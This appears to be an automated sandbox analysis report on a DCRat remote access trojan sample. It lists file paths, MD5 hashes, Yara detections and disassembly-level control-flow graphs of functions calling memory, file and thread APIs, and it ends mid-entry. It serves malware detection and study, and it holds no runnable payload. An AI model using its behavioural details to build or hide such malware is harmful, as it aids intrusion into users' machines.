                                                                                                                                        Start date:21/12/2024
                                                                                                                                        Path:C:\Windows\System32\PING.EXE
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:ping -n 10 localhost
                                                                                                                                        Imagebase:0x7ff7bdea0000
                                                                                                                                        File size:22'528 bytes
                                                                                                                                        MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high
                                                                                                                                        Has exited:true

                                                                                                                                        General

                                                                                                                                        Target ID:5
                                                                                                                                        Start time:04:07:15
                                                                                                                                        Start date:21/12/2024
                                                                                                                                        Path:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:"C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe"
                                                                                                                                        Imagebase:0xee0000
                                                                                                                                        File size:4'897'280 bytes
                                                                                                                                        MD5 hash:99209E1F30A833E0C7654FCC0AA2C9C5
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Yara matches:
                                                                                                                                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.4176520773.00000000035F8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.4176520773.0000000003779000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.4176520773.000000000345B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.4176520773.0000000003161000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                        Antivirus matches:
                                                                                                                                        • Detection: 79%, ReversingLabs
                                                                                                                                        Reputation:low
                                                                                                                                        Has exited:false

                                                                                                                                        Disassembly

                                                                                                                                        Reset < >

                                                                                                                                          Execution Graph

                                                                                                                                          Execution Coverage:14.8%
                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                          Signature Coverage:15.2%
                                                                                                                                          Total number of Nodes:33
                                                                                                                                          Total number of Limit Nodes:3
                                                                                                                                          execution_graph 14722 7ffd9b89f0f5 14723 7ffd9b89f11f VirtualAlloc 14722->14723 14725 7ffd9b89f23f 14723->14725 14726 7ffd9b89d2f5 14727 7ffd9b89d36b WriteFile 14726->14727 14729 7ffd9b89d48f 14727->14729 14742 7ffd9b89d04a 14743 7ffd9b89d059 CreateFileTransactedW 14742->14743 14745 7ffd9b89d268 14743->14745 14750 7ffd9b89b57d 14751 7ffd9b9014b0 14750->14751 14754 7ffd9b9007d0 14751->14754 14753 7ffd9b901599 14755 7ffd9b9007db 14754->14755 14757 7ffd9b90087e 14755->14757 14758 7ffd9b900897 14755->14758 14757->14753 14759 7ffd9b9008a2 14758->14759 14760 7ffd9b9008ea ResumeThread 14758->14760 14759->14757 14762 7ffd9b9009b4 14760->14762 14762->14757 14730 7ffd9b89e6e1 14733 7ffd9b89e6eb 14730->14733 14731 7ffd9b89e815 14737 7ffd9b89ec5a 14731->14737 14733->14731 14734 7ffd9b89e822 14733->14734 14735 7ffd9b89ec5a GetSystemInfo 14734->14735 14736 7ffd9b89e820 14735->14736 14739 7ffd9b89ec65 14737->14739 14738 7ffd9b89ec85 14738->14736 14739->14738 14740 7ffd9b89ed22 GetSystemInfo 14739->14740 14741 7ffd9b89ed85 14740->14741 14741->14736 14746 7ffd9b89ec91 14747 7ffd9b89ec9e GetSystemInfo 14746->14747 14749 7ffd9b89ed85 14747->14749

                                                                                                                                          Executed Functions

                                                                                                                                          Function 00007FFD9B891EC3 Relevance: 16.5, Strings: 12, Instructions: 1498COMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 0 7ffd9b891ec3-7ffd9b891f16 3 7ffd9b892285-7ffd9b8922a9 0->3 4 7ffd9b891f1c-7ffd9b891f42 0->4 9 7ffd9b8922ab-7ffd9b89230c 3->9 10 7ffd9b892311-7ffd9b89231c 3->10 7 7ffd9b891f59-7ffd9b891fa8 4->7 8 7ffd9b891f44-7ffd9b891f54 4->8 22 7ffd9b892218-7ffd9b89224d 7->22 12 7ffd9b893267-7ffd9b893275 8->12 9->12 13 7ffd9b89231e 10->13 14 7ffd9b89231f-7ffd9b892371 10->14 13->14 23 7ffd9b8923dc-7ffd9b892406 14->23 24 7ffd9b892373-7ffd9b8923d7 14->24 26 7ffd9b891fad-7ffd9b891fcc 22->26 27 7ffd9b892253-7ffd9b892265 22->27 30 7ffd9b892418-7ffd9b892446 23->30 31 7ffd9b892408-7ffd9b892413 23->31 24->12 36 7ffd9b892006-7ffd9b892008 26->36 37 7ffd9b891fce-7ffd9b892004 26->37 32 7ffd9b89226a-7ffd9b892280 27->32 39 7ffd9b89244c-7ffd9b892477 30->39 40 7ffd9b8924fd-7ffd9b892521 30->40 31->12 32->12 41 7ffd9b89200e-7ffd9b89201e 36->41 37->41 50 7ffd9b892479-7ffd9b8924cd 39->50 51 7ffd9b8924d0-7ffd9b8924f8 39->51 48 7ffd9b892527-7ffd9b89256e 40->48 49 7ffd9b89274e-7ffd9b892773 40->49 43 7ffd9b8921ce-7ffd9b89220f 41->43 44 7ffd9b892024-7ffd9b89207f 41->44 59 7ffd9b892210-7ffd9b892215 43->59 60 7ffd9b892081-7ffd9b8920ce 44->60 61 7ffd9b8920d3-7ffd9b8920f3 44->61 70 7ffd9b8925c0 48->70 71 7ffd9b892570-7ffd9b8925be 48->71 62 7ffd9b892775-7ffd9b8927e2 49->62 63 7ffd9b8927e4-7ffd9b8927e6 49->63 50->51 51->12 59->22 60->59 74 7ffd9b8920f5-7ffd9b89212c 61->74 75 7ffd9b89212e-7ffd9b892130 61->75 64 7ffd9b8927ec-7ffd9b8927fc 62->64 63->64 67 7ffd9b892b46-7ffd9b892b6b 64->67 68 7ffd9b892802-7ffd9b89282c 64->68 90 7ffd9b892bdc-7ffd9b892bde 67->90 91 7ffd9b892b6d-7ffd9b892bda 67->91 88 7ffd9b89282e 68->88 89 7ffd9b892833-7ffd9b89285d 68->89 77 7ffd9b8925ca-7ffd9b8925da 70->77 71->77 78 7ffd9b892136-7ffd9b892146 74->78 75->78 83 7ffd9b8925eb-7ffd9b892658 call 7ffd9b8906d0 77->83 84 7ffd9b8925dc-7ffd9b8925e6 77->84 86 7ffd9b89214c-7ffd9b8921a1 78->86 87 7ffd9b8921cd 78->87 122 7ffd9b8926ca-7ffd9b892700 83->122 84->12 115 7ffd9b8921cc 86->115 116 7ffd9b8921a3-7ffd9b8921ca 86->116 87->43 88->89 106 7ffd9b8928af 89->106 107 7ffd9b89285f-7ffd9b8928ad 89->107 95 7ffd9b892be4-7ffd9b892bfa 90->95 91->95 99 7ffd9b893119-7ffd9b89317f 95->99 100 7ffd9b892c00-7ffd9b892c39 95->100 132 7ffd9b8931a6-7ffd9b8931c3 99->132 133 7ffd9b893181-7ffd9b8931a1 call 7ffd9b8906e0 99->133 118 7ffd9b892c3b 100->118 119 7ffd9b892c40-7ffd9b892c5f 100->119 108 7ffd9b8928b9-7ffd9b8928c9 106->108 107->108 112 7ffd9b8928da-7ffd9b8928de call 7ffd9b8906d0 108->112 113 7ffd9b8928cb-7ffd9b8928d5 108->113 127 7ffd9b8928e3-7ffd9b892a3a 112->127 113->12 115->87 116->59 118->119 123 7ffd9b892c66-7ffd9b892cdf 119->123 124 7ffd9b892c61 119->124 135 7ffd9b892706-7ffd9b892749 122->135 136 7ffd9b89265a-7ffd9b8926c7 call 7ffd9b8906d8 122->136 149 7ffd9b892cf0-7ffd9b892d0d 123->149 150 7ffd9b892ce1-7ffd9b892ceb 123->150 124->123 189 7ffd9b892abc-7ffd9b892af8 127->189 143 7ffd9b893215-7ffd9b893217 132->143 144 7ffd9b8931c5-7ffd9b893213 132->144 133->12 135->12 136->122 151 7ffd9b89321d-7ffd9b893233 143->151 144->151 162 7ffd9b892d5f 149->162 163 7ffd9b892d0f-7ffd9b892d5d 149->163 150->12 154 7ffd9b893235-7ffd9b893259 call 7ffd9b8906f0 151->154 155 7ffd9b89325b-7ffd9b893265 151->155 154->12 155->12 167 7ffd9b892d69-7ffd9b892d7f 162->167 163->167 168 7ffd9b892d90-7ffd9b892df1 call 7ffd9b8906d0 167->168 169 7ffd9b892d81-7ffd9b892d8b 167->169 179 7ffd9b892e02-7ffd9b892f56 168->179 180 7ffd9b892df3-7ffd9b892dfd 168->180 169->12 209 7ffd9b8930c0-7ffd9b8930ff 179->209 180->12 193 7ffd9b892afe-7ffd9b892b41 189->193 194 7ffd9b892a3f-7ffd9b892ab9 call 7ffd9b8906d8 189->194 193->12 194->189 211 7ffd9b893105-7ffd9b893114 209->211 212 7ffd9b892f5b-7ffd9b892fa5 209->212 211->12 215 7ffd9b892fa7-7ffd9b892fa8 212->215 216 7ffd9b892fad-7ffd9b8930b0 call 7ffd9b8906d8 212->216 217 7ffd9b8930b1-7ffd9b8930ba 215->217 216->217 217->209
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1731176702.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b890000_3e88PGFfkf.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: "$H$[$[$\$]$]$u${${$}$}
                                                                                                                                          • API String ID: 0-2063274034
                                                                                                                                          • Opcode ID: 395f9dbff45a51e3d9d5ebf15c79dfeb0d79f35802d8213b09c20ecfd4caf974
                                                                                                                                          • Instruction ID: b773fe9f866c98a97a6136f5254b690a6ee626b637ec8e79fc12eb0d3bec162a
                                                                                                                                          • Opcode Fuzzy Hash: 395f9dbff45a51e3d9d5ebf15c79dfeb0d79f35802d8213b09c20ecfd4caf974
                                                                                                                                          • Instruction Fuzzy Hash: EAD2A470E1962D8FDBA8DF58C8A5BA9B7B1FF58305F5041EAD00DE3295DA346A81CF40
                                                                                                                                          Function 00007FFD9B89EC5A Relevance: 1.7, APIs: 1, Instructions: 168COMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 1064 7ffd9b89ec5a-7ffd9b89ec63 1065 7ffd9b89ec65-7ffd9b89ec83 1064->1065 1066 7ffd9b89ecad 1064->1066 1071 7ffd9b89ec85-7ffd9b89ec8f 1065->1071 1072 7ffd9b89ec9e-7ffd9b89ecaa 1065->1072 1067 7ffd9b89ecb0-7ffd9b89ed1a 1066->1067 1068 7ffd9b89ecaf 1066->1068 1074 7ffd9b89ed22-7ffd9b89ed83 GetSystemInfo 1067->1074 1068->1067 1072->1066 1075 7ffd9b89ed85 1074->1075 1076 7ffd9b89ed8b-7ffd9b89edbb 1074->1076 1075->1076
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1731176702.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b890000_3e88PGFfkf.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InfoSystem
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 31276548-0
                                                                                                                                          • Opcode ID: 705aa69a17775c0a824998b2ff1fffede70d48fe38e410acefc8b5712b0ed83e
                                                                                                                                          • Instruction ID: 4359724995e80d122c6c1fb2b1d95df7c36ba722a9e35cddb9460df1dafbfe7e
                                                                                                                                          • Opcode Fuzzy Hash: 705aa69a17775c0a824998b2ff1fffede70d48fe38e410acefc8b5712b0ed83e
                                                                                                                                          • Instruction Fuzzy Hash: 2351DF30A09A4C8FDB59DFA8D855AE9BFF0FF59310F1041ABD04DD72A2DA35694ACB40
                                                                                                                                          Function 00007FFD9B8A3415 Relevance: .7, Instructions: 702COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1731176702.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b890000_3e88PGFfkf.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: e54c8c0106ab20cd350a84f5fc60139842a20fd1946777bade2b91b5b35e9c01
                                                                                                                                          • Instruction ID: 6127a4b009c20c8a194afdd0d5d0a0ad03e4bda24ae5ea2ffbbc28f4b212311a
                                                                                                                                          • Opcode Fuzzy Hash: e54c8c0106ab20cd350a84f5fc60139842a20fd1946777bade2b91b5b35e9c01
                                                                                                                                          • Instruction Fuzzy Hash: C1524A70A0961D8FDB68DF54C4A4AF97BB2FF58304F5041ADD04EA7291CB39AA46CF90
                                                                                                                                          Function 00007FFD9BA87DC9 Relevance: 3.0, Strings: 2, Instructions: 494COMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 590 7ffd9ba87dc9-7ffd9ba87e04 591 7ffd9ba87e0a-7ffd9ba87e0f 590->591 592 7ffd9ba88121-7ffd9ba8812b 590->592 593 7ffd9ba87e11-7ffd9ba87e14 591->593 594 7ffd9ba87e1b-7ffd9ba87e34 591->594 598 7ffd9ba8812c-7ffd9ba8819e 592->598 593->594 596 7ffd9ba87e48-7ffd9ba87e75 594->596 597 7ffd9ba87e36-7ffd9ba87e46 594->597 596->598 601 7ffd9ba87e7b-7ffd9ba87e86 596->601 597->596 624 7ffd9ba881bb-7ffd9ba881cc 598->624 625 7ffd9ba881a0-7ffd9ba881a6 598->625 603 7ffd9ba87f44-7ffd9ba87f49 601->603 604 7ffd9ba87e8c-7ffd9ba87e9a 601->604 607 7ffd9ba87f4f-7ffd9ba87f59 603->607 608 7ffd9ba87fdd-7ffd9ba87fe7 603->608 604->598 605 7ffd9ba87ea0-7ffd9ba87eb1 604->605 611 7ffd9ba87eb3-7ffd9ba87ed6 605->611 612 7ffd9ba87f19-7ffd9ba87f30 605->612 607->598 614 7ffd9ba87f5f-7ffd9ba87f73 607->614 609 7ffd9ba88009-7ffd9ba88010 608->609 610 7ffd9ba87fe9-7ffd9ba88007 608->610 615 7ffd9ba88013-7ffd9ba8801d 609->615 610->609 616 7ffd9ba87edc-7ffd9ba87eef 611->616 617 7ffd9ba87f78-7ffd9ba87f7d 611->617 612->598 618 7ffd9ba87f36-7ffd9ba87f3e 612->618 614->615 615->598 623 7ffd9ba88023-7ffd9ba8803b 615->623 620 7ffd9ba87ef3-7ffd9ba87f17 616->620 617->620 618->603 618->604 620->612 636 7ffd9ba87f82-7ffd9ba87f85 620->636 623->598 627 7ffd9ba88041-7ffd9ba88059 623->627 630 7ffd9ba881dd-7ffd9ba88200 624->630 631 7ffd9ba881ce-7ffd9ba881dc 624->631 628 7ffd9ba881a8-7ffd9ba881b9 625->628 629 7ffd9ba88201-7ffd9ba8822e 625->629 627->598 633 7ffd9ba8805f-7ffd9ba88093 627->633 628->624 628->625 631->630 633->598 655 7ffd9ba88099-7ffd9ba880ac 633->655 637 7ffd9ba87f9b-7ffd9ba87fa8 636->637 638 7ffd9ba87f87-7ffd9ba87f97 636->638 637->598 642 7ffd9ba87fae-7ffd9ba87fdc 637->642 638->637 657 7ffd9ba880ae-7ffd9ba880b9 655->657 658 7ffd9ba8810f-7ffd9ba88120 655->658 657->658 660 7ffd9ba880bb-7ffd9ba880d2 657->660 662 7ffd9ba880e3-7ffd9ba88105 660->662 663 7ffd9ba880d4-7ffd9ba880dd 660->663 662->658 666 7ffd9ba880df 663->666 666->666 667 7ffd9ba880e1-7ffd9ba880e2 666->667 667->662
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1732354126.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba80000_3e88PGFfkf.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: /$d
                                                                                                                                          • API String ID: 0-2003278888
                                                                                                                                          • Opcode ID: d2bdc042d626cfa690b28c809645c356eb99bf8b4e508dc7373cf22d46e8379d
                                                                                                                                          • Instruction ID: 0ce074bb54c9cf028b1fb759fdaee0e0b2980f2d51dcd2caf9f720201db06de6
                                                                                                                                          • Opcode Fuzzy Hash: d2bdc042d626cfa690b28c809645c356eb99bf8b4e508dc7373cf22d46e8379d
                                                                                                                                          • Instruction Fuzzy Hash: ABE11F30A19A0A8FD759EF28D8A1975B7E1FF95310B1441BAD449CB2ABDE34EC43C781
                                                                                                                                          Function 00007FFD9BA83AF0 Relevance: 2.9, Strings: 2, Instructions: 364COMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 669 7ffd9ba83af0-7ffd9ba83b0a 670 7ffd9ba83b10-7ffd9ba83b20 669->670 671 7ffd9ba8410c-7ffd9ba8411a 669->671 672 7ffd9ba8416a-7ffd9ba84180 670->672 673 7ffd9ba83b26-7ffd9ba83b61 670->673 674 7ffd9ba84121-7ffd9ba84130 671->674 675 7ffd9ba8411c 671->675 678 7ffd9ba84182-7ffd9ba841a6 672->678 679 7ffd9ba841ca-7ffd9ba841dd 672->679 680 7ffd9ba83bfa-7ffd9ba83c02 673->680 675->674 681 7ffd9ba83c08 680->681 682 7ffd9ba83b66-7ffd9ba83b6f 680->682 683 7ffd9ba83c12-7ffd9ba83c2f 681->683 682->672 684 7ffd9ba83b75-7ffd9ba83b80 682->684 687 7ffd9ba83c36-7ffd9ba83c47 683->687 685 7ffd9ba83c0a-7ffd9ba83c0e 684->685 686 7ffd9ba83b86-7ffd9ba83b9a 684->686 685->683 688 7ffd9ba83bf3-7ffd9ba83bf7 686->688 689 7ffd9ba83b9c-7ffd9ba83bb3 686->689 694 7ffd9ba83c60-7ffd9ba83c6f 687->694 695 7ffd9ba83c49-7ffd9ba83c5e 687->695 688->680 689->672 690 7ffd9ba83bb9-7ffd9ba83bc5 689->690 692 7ffd9ba83bdf-7ffd9ba83bf0 690->692 693 7ffd9ba83bc7-7ffd9ba83bdb 690->693 692->688 693->689 696 7ffd9ba83bdd 693->696 700 7ffd9ba83c91-7ffd9ba83cfe 694->700 701 7ffd9ba83c71-7ffd9ba83c8c 694->701 695->694 696->688 710 7ffd9ba83d00-7ffd9ba83d13 700->710 711 7ffd9ba83d4f-7ffd9ba83d60 700->711 707 7ffd9ba840c9-7ffd9ba84106 701->707 707->670 707->671 710->672 713 7ffd9ba83d19-7ffd9ba83d4d 710->713 711->707 713->710 713->711
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1732354126.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba80000_3e88PGFfkf.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: ._L$9_L
                                                                                                                                          • API String ID: 0-1579801836
                                                                                                                                          • Opcode ID: 96568dbf0baba790a019de1de7e0b55fe235a5d83af6362410deea185a67ebd4
                                                                                                                                          • Instruction ID: 5e949241a9e7d3d1e018bc14927369c12b2b780cea2704cc78fed9f47feb6faa
                                                                                                                                          • Opcode Fuzzy Hash: 96568dbf0baba790a019de1de7e0b55fe235a5d83af6362410deea185a67ebd4
                                                                                                                                          • Instruction Fuzzy Hash: C9C1A430B18A1D8FDB58DF58C8999B9B3E2FF55314B1141A9D04EC76A6DE35EC42CB40
                                                                                                                                          Function 00007FFD9BA8BC18 Relevance: 2.7, Strings: 2, Instructions: 156COMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1732354126.00007FFD9BA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA80000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba80000_3e88PGFfkf.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: $W
                                                                                                                                          • API String ID: 0-3287005699
                                                                                                                                          • Opcode ID: 2093cfc76ca9b70032e09690d863c775eb8a4c0d85e2cbab63f3f0f5f135273f
                                                                                                                                          • Instruction ID: ed17afdabe81718394c7399bc381e64afdaf83da044f76f87317da3156f3755b
                                                                                                                                          • Opcode Fuzzy Hash: 2093cfc76ca9b70032e09690d863c775eb8a4c0d85e2cbab63f3f0f5f135273f
                                                                                                                                          • Instruction Fuzzy Hash: 2B519D70E0990E8FDB69DB98C4645FDB7B1EF48300F5141BAC01AE76E6CE792A01CB40
                                                                                                                                          Function 00007FFD9B89D04A Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 1044 7ffd9b89d04a-7ffd9b89d057 1045 7ffd9b89d059-7ffd9b89d061 1044->1045 1046 7ffd9b89d062-7ffd9b89d128 1044->1046 1045->1046 1050 7ffd9b89d12a-7ffd9b89d141 1046->1050 1051 7ffd9b89d144-7ffd9b89d266 CreateFileTransactedW 1046->1051 1050->1051 1052 7ffd9b89d268 1051->1052 1053 7ffd9b89d26e-7ffd9b89d2f0 1051->1053 1052->1053
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1731176702.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b890000_3e88PGFfkf.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CreateFileTransacted
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2149338676-0
                                                                                                                                          • Opcode ID: 63299aad71cc69791753de83e6386fd7c370cd229f280d635fddec8c8b756636
                                                                                                                                          • Instruction ID: e4540ca32bd2fdc49b09fe3edc73c53031b8ee5e6431757dde95f061e2d2e8c9
                                                                                                                                          • Opcode Fuzzy Hash: 63299aad71cc69791753de83e6386fd7c370cd229f280d635fddec8c8b756636
                                                                                                                                          • Instruction Fuzzy Hash: C7911270908A5D8FDB99DF58C894BA9BBF1FB6A310F1001AED04DE3291DB75A984CB04
                                                                                                                                          Function 00007FFD9B89D2F5 Relevance: 1.7, APIs: 1, Instructions: 217fileCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 1056 7ffd9b89d2f5-7ffd9b89d3c2 1059 7ffd9b89d3ea-7ffd9b89d48d WriteFile 1056->1059 1060 7ffd9b89d3c4-7ffd9b89d3e7 1056->1060 1061 7ffd9b89d495-7ffd9b89d4f1 1059->1061 1062 7ffd9b89d48f 1059->1062 1060->1059 1062->1061
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1731176702.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b890000_3e88PGFfkf.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: FileWrite
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3934441357-0
                                                                                                                                          • Opcode ID: f5772bf6395794cbfd6941a7a957cc52f4f5abce1607380c848eacc12e329add
                                                                                                                                          • Instruction ID: 967c9b7fcff1679e07638928c0093111fed7be5bf80118934791c39e2250ccff
                                                                                                                                          • Opcode Fuzzy Hash: f5772bf6395794cbfd6941a7a957cc52f4f5abce1607380c848eacc12e329add
                                                                                                                                          • Instruction Fuzzy Hash: 40611470A08A5C8FDB98DF58C895BE9BBF1FB69311F1041AED04DE3251DB74A985CB40
                                                                                                                                          Function 00007FFD9B900897 Relevance: 1.6, APIs: 1, Instructions: 150threadCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 1079 7ffd9b900897-7ffd9b9008a0 1080 7ffd9b9008ea-7ffd9b9009b2 ResumeThread 1079->1080 1081 7ffd9b9008a2-7ffd9b9008c2 1079->1081 1085 7ffd9b9009ba-7ffd9b900a04 1080->1085 1086 7ffd9b9009b4 1080->1086 1086->1085
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1731176702.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b890000_3e88PGFfkf.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ResumeThread
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 947044025-0
                                                                                                                                          • Opcode ID: 231d34e42afdbef3672f72a9a0add8de7536184a1623f9ecfc1fc685e23cf72d
                                                                                                                                          • Instruction ID: 542f89007d0f09283602310a5e29e7e34120be4efadd05cae1a0c998ed04579e
                                                                                                                                          • Opcode Fuzzy Hash: 231d34e42afdbef3672f72a9a0add8de7536184a1623f9ecfc1fc685e23cf72d
                                                                                                                                          • Instruction Fuzzy Hash: 16415874E0860C8FDB98EFA8D885AEDBBF0FB59310F10416AD44DE7252DB31A946CB41
                                                                                                                                          Function 00007FFD9B89EC91 Relevance: 1.6, APIs: 1, Instructions: 144COMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 1089 7ffd9b89ec91-7ffd9b89ecad 1092 7ffd9b89ecb0-7ffd9b89ed83 GetSystemInfo 1089->1092 1093 7ffd9b89ecaf 1089->1093 1097 7ffd9b89ed85 1092->1097 1098 7ffd9b89ed8b-7ffd9b89edbb 1092->1098 1093->1092 1097->1098
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1731176702.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b890000_3e88PGFfkf.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InfoSystem
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 31276548-0
                                                                                                                                          • Opcode ID: bc5928ac05548ee88ff44ae4ed60b757fb00263fcf0216a16fdc4c6f87412c58
                                                                                                                                          • Instruction ID: 1ef353a268bf8df05a35c1fc235831e2aca26678a07317c49ec5d744c69bf37f
                                                                                                                                          • Opcode Fuzzy Hash: bc5928ac05548ee88ff44ae4ed60b757fb00263fcf0216a16fdc4c6f87412c58
                                                                                                                                          • Instruction Fuzzy Hash: A0419D3090D68C8FDB99DBA8D859BE9BFF0EF5A310F1441ABD04DD72A2CA345946CB41
                                                                                                                                          Function 00007FFD9BA8AC76 Relevance: 1.5, Strings: 1, Instructions: 268COMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
